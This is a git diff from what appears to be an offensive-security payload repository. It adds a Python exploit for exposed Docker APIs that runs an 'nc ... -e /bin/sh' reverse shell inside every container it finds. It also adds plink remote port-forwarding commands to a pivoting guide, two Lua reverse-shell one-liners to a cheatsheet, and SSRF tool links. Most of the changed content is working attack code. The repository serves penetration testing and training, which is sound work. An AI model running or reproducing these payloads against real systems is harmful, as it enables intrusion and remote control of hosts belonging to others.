diff --git a/CVE Exploits/Docker API RCE.py b/CVE Exploits/Docker API RCE.py new file mode 100644 index 0000000..1f8cea9 --- /dev/null +++ b/CVE Exploits/Docker API RCE.py @@ -0,0 +1,48 @@ +import requests +import logging +import json +import urllib.parse + +# NOTE +# Enable Remote API with the following command +# /usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock +# This is an intended feature, remember to filter the port 2375.. + +name = "docker" +description = "Docker RCE via Open Docker API on port 2375" +author = "Swissky" + +# Step 1 - Extract id and name from each container +ip = "127.0.0.1" +port = "2375" +data = "containers/json" +url = "http://{}:{}/{}".format(ip, port, data) +r = requests.get(url) + +if r.json: + for container in r.json(): + container_id = container['Id'] + container_name = container['Names'][0].replace('/','') + print(container_id, container_name) + + # Step 2 - Prepare command + cmd = '["nc", "192.168.1.2", "4242", "-e", "/bin/sh"]' + data = "containers/{}/exec".format(container_name) + url = "http://{}:{}/{}".format(ip, port, data) + post_json = '{ "AttachStdin":false,"AttachStdout":true,"AttachStderr":true, "Tty":false, "Cmd":'+cmd+' }' + post_header = { + "Content-Type": "application/json" + } + r = requests.post(url, json=json.loads(post_json)) + + + # Step 3 - Execute command + id_cmd = r.json()['Id'] + data = "exec/{}/start".format(id_cmd) + url = "http://{}:{}/{}".format(ip, port, data) + post_json = '{ "Detach":false,"Tty":false}' + post_header = { + "Content-Type": "application/json" + } + r = requests.post(url, json=json.loads(post_json)) + print(r) \ No newline at end of file diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index 5203216..d49e426 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -92,6 +92,14 @@ python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [pro --hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE ``` +## plink + +```powershell +plink -l root -pw toor ssh-server-ip -R 3390:127.0.0.1:3389 --> exposes the RDP port of the machine in the port 3390 of the SSH Server +plink -l root -pw mypassword 192.168.18.84 -R +plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP] +``` + ## Basic Pivoting Types | Type | Use Case | diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index 497eb1c..44248b8 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -116,10 +116,18 @@ p.waitFor() ### Lua +Linux only + ```powershell lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');" ``` +Windows and Linux + +```powershell +lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' +``` + ### NodeJS ```javascript diff --git a/README.md b/README.md index d8eec19..43bb035 100644 --- a/README.md +++ b/README.md @@ -115,6 +115,7 @@ Grab a book and relax, these ones are the best security books (in my opinion). | `docker pull owasp/zap2docker-stable` | [official OWASP ZAP](https://github.com/zaproxy/zaproxy) | | `docker pull wpscanteam/wpscan` | [official WPScan](https://hub.docker.com/r/wpscanteam/wpscan/) | | `docker pull infoslack/dvwa` | [Damn Vulnerable Web Application (DVWA)](https://hub.docker.com/r/infoslack/dvwa/) | +| `docker run --name dvna -p 9090:9090 -d appsecco/dvna:sqlite` | [Damn Vulnerable NodeJS Application](https://github.com/appsecco/dvna) | | `docker pull danmx/docker-owasp-webgoat` | [OWASP WebGoat Project docker image](https://hub.docker.com/r/danmx/docker-owasp-webgoat/) | | `docker pull opendns/security-ninjas` | [Security Ninjas](https://hub.docker.com/r/opendns/security-ninjas/) | | `docker pull ismisepaul/securityshepherd` | [OWASP Security Shepherd](https://hub.docker.com/r/ismisepaul/securityshepherd/) | diff --git a/SSRF injection/README.md b/SSRF injection/README.md index 7171923..8b9ddcd 100644 --- a/SSRF injection/README.md +++ b/SSRF injection/README.md @@ -2,6 +2,11 @@ Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf. +Tools: + +- [SSRFmap - https://github.com/swisskyrepo/SSRFmap](https://github.com/swisskyrepo/SSRFmap) +- [Gopherus - https://github.com/tarunkant/Gopherus](https://github.com/tarunkant/Gopherus) + ## Summary * [Exploit with localhost](#summary) @@ -85,7 +90,6 @@ Bypass localhost with a domain redirecting to locahost ```powershell http://localtest.me -http://n-pn.info http://customer1.app.localhost.my.company.127.0.0.1.nip.io ``` diff --git a/XSS injection/README.md b/XSS injection/README.md index 35321d8..d9ef727 100644 --- a/XSS injection/README.md +++ b/XSS injection/README.md @@ -95,6 +95,11 @@ XSS for HTML5